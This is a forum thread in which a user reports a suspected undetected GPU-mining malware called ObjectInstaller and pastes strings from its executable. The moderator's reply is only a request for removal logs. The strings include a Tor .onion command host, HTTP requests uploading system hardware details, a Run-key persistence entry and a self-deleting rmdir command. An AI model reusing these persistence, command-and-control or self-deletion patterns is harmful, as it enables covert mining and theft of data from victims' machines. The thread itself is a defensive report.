Go Back   Tech Support Forum > Security Center > Virus/Trojan/Spyware Help

User Tag List

I found a new virus not detected by any anti virus. Objectinstaller

This is a discussion on I found a new virus not detected by any anti virus. Objectinstaller within the Virus/Trojan/Spyware Help forums, part of the Tech Support Forum category. Nothing detects this yet. Not malwarebytes Not ADW Not Win defender No antivirus programs The process creates a C:\Program Files\ObjectInstallerService


Like Tree1Likes
  • 1 Post By chemist
Closed Thread
 
Thread Tools Search this Thread
Old 07-11-2018, 05:07 PM   #1
Registered Member
 
Join Date: Aug 2004
Posts: 4
OS: xp



Nothing detects this yet.

Not malwarebytes

Not ADW

Not Win defender

No antivirus programs

The process creates a C:\Program Files\ObjectInstallerService folder containing a data file and objectinstaller.exe

This is a delayed service in Windows services.

The .exe file is a self extracting executable.

It creates a Tor folder in program files.

Examining the contents of the zip without executing it lists a number of files. One of which contains the following string.

The executable strings include:



A p p D a t a G P U R i s e g p u r i s e . z i p !G P U R i s e A g e n t . e x e s e r v i c e 2 o t h e r p a y l o a d 2 . z i p s t a r t _ m i n 1\ O b j e c t I n s t a l l e r S e r v i c e \ W/ C c h o i c e / C Y / N / D Y / T 8 & r m d i r / Q / S " " c m d . e x e [S o f t w a r e \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ R u n 1 2 7 . 0 . 0 . 1 -m j o 7 m w 3 q 4 m t g s i k z . o n i o n G E T / ۇ H T T P / 1 . 1

H o s t : m j o 7 m w 3 q 4 m t g s i k z . o n i o n

C o n n e c t i o n : k e e p - a l i v e

A c c e p t : t e x t / h t m l

U s e r - A g e n t : g p u b o o s t 0 . 1







7\

C o n t e n t - L e n g t h : ( . * ? ) \

X 2 d e s k t o p
l a p t o p ;s e l e c t * f r o m W i n 3 2 _ P r o c e s s o r Gs e l e c t * f r o m W i n 3 2 _ V i d e o C o n t r o l l e r r o o t \ C I M V 2 iS E L E C T T o t a l P h y s i c a l M e m o r y F R O M W i n 3 2 _ C o m p u t e r S y s t e m 'T o t a l P h y s i c a l M e m o r y n a m e A d a p t e r R A M
n v i d i a a m d N u m b e r O f C o r e s SS E L E C T C a p t i o n F R O M W i n 3 2 _ O p e r a t i n g S y s t e m / u p l o a d / i n s t a l l !P O S T / u p l o a d H T T P / 1 . 1

H o s t : m j o 7 m w 3 q 4 m t g s i k z . o n i o n

C o n n e c t i o n : k e e p - a l i v e

A c c e p t : t e x t / h t m l

C o n t e n t - t y p e : a p p l i c a t i o n / j s o n

C o n t e n t - L e n g t h : 7

U s e r - A g e n t : m i n e r 0 . 1



g e f o r c e
r a d e o n QB a d r e s p o n s e r e c e i v e d f r o m p r o x y s e r v e r . 1A u t h e n t i c a t i o n r e q u i r e d . CO p e r a t i o n c o m p l e t e d s u c c e s s f u l l y . ;G e n e r a l S O C K S s e r v e r f a i l u r e . EC o n n e c t i o n n o t a l l o w e d b y r u l e s e t . )N e t w o r k u n r e a c h a b l e . #H o s t u n r e a c h a b l e . 'C o n n e c t i o n r e f u s e d . T T L e x p i r e d . -C o m m a n d n o t s u p p o r t e d . 7A d d r e s s t y p e n o t s u p p o r t e d . U n k n o w n e r r o r . t o r t o r . e x e t o r . z i p MT o r h a s s u c c e s s f u l l y o p e n e d a c i r c u i t . \ T o r \ X = Y = E n t e r X O f f s e t X O f f s e t 1 'W r o n g P a r a m e t e r s . . . E n t e r Y O f f s e t Y O f f s e t %p i c t u r e L e v e l . I m a g e p i c t u r e L e v e l
p R i g h t p L e f t p S e l e c t e d l i s t m e n u m e n u S t r i p 1 +f i l e T o o l S t r i p M e n u I t e m F i l e m O p e n O p e n . . . m S a v e S a v e m S a v e A s S a v e a s . . . %t o o l S t r i p M e n u I t e m 1 m E x i t E x i t 1a c t i o n d T o o l S t r i p M e n u I t e m A c t i o n s Ao f f s e t X S e l e c t e d T o o l S t r i p M e n u I t e m !O f f s e t X S e l e c t e d Ao f f s e t Y S e l e c t e d T o o l S t r i p M e n u I t e m !O f f s e t Y S e l e c t e d -a b o u t T o o l S t r i p M e n u I t e m A b o u t P T o p P R e s t )M a r i o L e v e l s | * . x m l p B u t t o m
s t a t u s s t a t u s S t r i p 1
l a b e l x
l a b e l y
T a h o m a o b j e c t n a m e l a b e l $ t h i s . I c o n M a i n F o r m L e v e l E d i t o r . d l l c I n t c B o o l T r u e F a l s e
: X = , Y = . A r i a l l N a m e
l a b e l 1 c I n t 1 c I n t 2 c I n t 3
c B o o l 1
c B o o l 2
c B o o l 3
b C l o s e C l o s e b S a v e F o r m P a r a m s #O b j e c t P r o p e r t i e s / d a t a / u / I n s t a l l S e r v i c e -O b j e c t I n s t a l l e r S e r v i c e KM a r i o L e v e l E d i t o r . P r o p e r t i e s . R e s o u r c e s S e l e c t e d C a p t i o n





.onion is undeniably the Tor network. I believe its a GPU miner. It mines bitcoin remotely by taking over your GPU.



I don't know how I got this or who to inform about this file.

I saved a .zip copy if anyone wants it.
Gold333 is offline  
Sponsored Links
Advertisement
 
Old 07-11-2018, 09:52 PM   #2
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
chemist's Avatar

Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello and Welcome to TSF.

We want all our members to perform the steps outlined here:

https://www.techsupportforum.com/secu...oval-help.html

After running through all the steps, you shall have a proper set of logs. Please post them in a new thread, as this one shall be closed.

If you have trouble with one of the steps, simply move on to the next one, and make note of it in your reply.

Please note that the Virus/Trojan/Spyware Help Forum is extremely busy, and it may take a while to receive a reply.

------------------------------------------------------
PeterL likes this.
__________________
Our services are free, but you may contribute to the author of ComboFix via PayPal

Proud member of UNITE

Microsoft MVP - Consumer Security 2014, 2015
chemist is offline  
Closed Thread

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Similar Threads
Thread Thread Starter Forum Replies Last Post
Need Malware Removed
My apology to ryder. Starting over. Thanks for your time. It pops up a window in the FF browser to redirect to redirsvc.com. I do not allow it to redirect but I did once. It also highlights and double underlines words on web pages. FF keeps crashing...althought I updated recently. I keep new...
BrentC Inactive Malware Help Topics 53 12-24-2013 07:09 AM
w32.shadesrat & dark comet RAT removal help
first off sorry about my grammar and i could not upload ark.txt and attach.txt in a compressed zip folder winrar kept packing it as a rar zip archive but about the virus a few days ago i was down loading some things off the internet and came across w32.shadesrat norton said blocked w32.shadesrat...
eatabagel Inactive Malware Help Topics 14 11-06-2013 08:33 AM
possibly spyware, adware or what ever else.
Hi all, when i open a browser, it automatically direct me to some random sites. I tried making my default homepage something else but it still does the same thing. I would believe that it is either spyware or adware. Moreover, I have experienced that sometimes when i idol from my computer, it...
kewin118 Resolved HJT Threads 19 10-30-2012 04:49 AM
Videos and Adobe FlashPlayer
Hello, Recently, suddenly when I would go to my YouTube Channel, the videos I was trying to watch would pause very frequently, to the point where I could barely watch them. Then I tried uninstalling and re-installing the Adobe Flash Player, and also Adobe Air. I wasnt sure if Adobe Air had...
claudiathompson Windows XP Support 42 04-16-2011 01:38 AM
Possible worm/rootkit?
Hi /all- Recently I Have been having alot of slowdowns, lots of hanging programs/crashes, and most annoyingly people on my contact lists are recieving emails from me with ad's and links, that I did not send. ("uncoincedently" started about the time I let my siblings use my rig/user :upset: next...
BHM Resolved HJT Threads 7 02-15-2011 06:01 AM

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is on
Smilies are on
[IMG] code is on
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Post a Question


» Site Navigation
 > FAQ
  > 10.0.0.2
Powered by vBadvanced CMPS v3.2.3


All times are GMT -7. The time now is 12:03 PM.


Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2020, vBulletin Solutions, Inc.
vBulletin Security provided by vBSecurity v2.2.2 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
User Alert System provided by Advanced User Tagging v3.1.0 (Pro) - vBulletin Mods & Addons Copyright © 2020 DragonByte Technologies Ltd.
Copyright 2001 - 2018, Tech Support Forum

Windows 10 - Windows 7 - Windows XP - Windows Vista - Trojan Removal - Spyware Removal - Virus Removal - Networking - Security - Top Web Hosts